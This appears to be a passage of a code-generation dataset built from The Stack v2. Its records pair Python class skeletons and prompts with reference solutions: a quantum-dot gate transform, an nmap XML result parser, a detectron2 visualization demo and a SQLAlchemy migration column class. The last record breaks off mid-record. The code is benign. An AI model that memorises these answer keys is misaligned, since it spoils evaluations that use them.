{}\nzz = np.zeros(nn if nn is not None else (), dtype=float)\nif isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\nelse:\n gate_values = np.array(vals2D).astype(float)\ngate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\nfor j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\nreturn vals2Dout"], "bodies_text": "<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "class_docstring": "", "class_name": "GateTransform", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000034", "length_bytes": 28215, "license_type": "permissive", "methods": [{"docstring": "Class to describe a linear transformation between source and target gates.", "name": "__init__", "signature": "def __init__(self, Vmatrix, sourcenames, targetnames)"}, {"docstring": "Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.", "name": "transformGateScan", "signature": "def transformGateScan(self, vals2D, nn=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003216", "prompt": "Implement the Python class `GateTransform` described below.\n\nClass description:\nImplement the GateTransform class.\n\nMethod signatures and docstrings:\n- def __init__(self, Vmatrix, sourcenames, targetnames): Class to describe a linear transformation between source and target gates.\n- def transformGateScan(self, vals2D, nn=None): Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.", "prompted_full_text": "Implement the Python class `GateTransform` described below.\n\nClass description:\nImplement the GateTransform class.\n\nMethod signatures and docstrings:\n- def __init__(self, Vmatrix, sourcenames, targetnames): Class to describe a linear transformation between source and target gates.\n- def transformGateScan(self, vals2D, nn=None): Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\n\n<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "revision_id": "208c9c53309e10484e9883d537b53282cb83a43d", "skeleton": "<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GateTransform:\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\"\"\"\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n", "source": "the_stack_v2_python_sparse", "source_path": "src/qtt/simulation/dotsystem.py", "source_repo": "QuTech-Delft/qtt", "split": "test", "star_events_count": 58} {"blob_id": "4e17baec440eed22ff47d5ed9e440e91edc021ef", "bodies": ["pidb = ParsedItemsDb()\nif is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\nreturn cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)", "report = libnmap.parser.NmapParser.parse_fromstring(data)\nfor ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\nreturn pidb"], "bodies_text": "<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "class_docstring": "nmap xml output parser", "class_name": "ParserModule", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000035", "length_bytes": 3775, "license_type": "permissive", "methods": [{"docstring": "parse data from path", "name": "parse_path", "signature": "def parse_path(cls, path)"}, {"docstring": "parse raw string data", "name": "_parse_data", "signature": "def _parse_data(cls, data, pidb)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004105", "prompt": "Implement the Python class `ParserModule` described below.\n\nClass description:\nnmap xml output parser\n\nMethod signatures and docstrings:\n- def parse_path(cls, path): parse data from path\n- def _parse_data(cls, data, pidb): parse raw string data", "prompted_full_text": "Implement the Python class `ParserModule` described below.\n\nClass description:\nnmap xml output parser\n\nMethod signatures and docstrings:\n- def parse_path(cls, path): parse data from path\n- def _parse_data(cls, data, pidb): parse raw string data\n\n<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "revision_id": "d5d8e9cdd6dd058dd91eb119965a3f9f737e5c34", "skeleton": "<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n", "source": "the_stack_v2_python_sparse", "source_path": "sner/plugin/nmap/parser.py", "source_repo": "bodik/sner4", "split": "test", "star_events_count": 13} {"blob_id": "23ebeeab9485926e5e9068ca601a02bc46d51487", "bodies": ["self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\nself.cpu_device = torch.device('cpu')\nself.instance_mode = instance_mode\nself.predictor = BatchPredictor(cfg)", "vis_output = None\nall_predictions = self.predictor(image_list)\nif visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\nreturn (all_predictions, vis_output)"], "bodies_text": "<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "VisualizationDemo", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000036", "length_bytes": 8707, "license_type": "permissive", "methods": [{"docstring": "Args: cfg (CfgNode): instance_mode (ColorMode):", "name": "__init__", "signature": "def __init__(self, cfg, instance_mode=ColorMode.IMAGE)"}, {"docstring": "Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.", "name": "run_on_image", "signature": "def run_on_image(self, image_list, visualize=0)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001292", "prompt": "Implement the Python class `VisualizationDemo` described below.\n\nClass description:\nImplement the VisualizationDemo class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg, instance_mode=ColorMode.IMAGE): Args: cfg (CfgNode): instance_mode (ColorMode):\n- def run_on_image(self, image_list, visualize=0): Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.", "prompted_full_text": "Implement the Python class `VisualizationDemo` described below.\n\nClass description:\nImplement the VisualizationDemo class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg, instance_mode=ColorMode.IMAGE): Args: cfg (CfgNode): instance_mode (ColorMode):\n- def run_on_image(self, image_list, visualize=0): Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\n\n<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "revision_id": "999639b58ef2b5b6fcc5a8b27cba8777452a7f1f", "skeleton": "<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VisualizationDemo:\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n", "source": "the_stack_v2_python_sparse", "source_path": "Object-Goal-Navigation/agents/utils/semantic_prediction.py", "source_repo": "haokuanluo/Object-Goal-Navigation", "split": "test", "star_events_count": 3} {"blob_id": "286342270909fcc1e02f8c60a70b9e23a607b65d", "bodies": ["if 'table' not in k:\n k['table'] = self.table\nif 'engine' not in k:\n k['engine'] = k['table'].bind\nreturn alter_column(self, *p, **k)", "table = _normalize_table(self, table)\nengine = table.bind\nvisitorcallable = get_engine_visitor(engine, 'columngenerator')\nengine._run_visitor(visitorcallable, self, *args, **kwargs)\nif self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\nreturn self", "table = _normalize_table(self, table)\nengine = table.bind\nvisitorcallable = get_engine_visitor(engine, 'columndropper')\nengine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\nreturn self"], "bodies_text": "<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "class_docstring": "Changeset extensions to SQLAlchemy columns", "class_name": "ChangesetColumn", "detected_licenses": ["CC-BY-2.5", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, 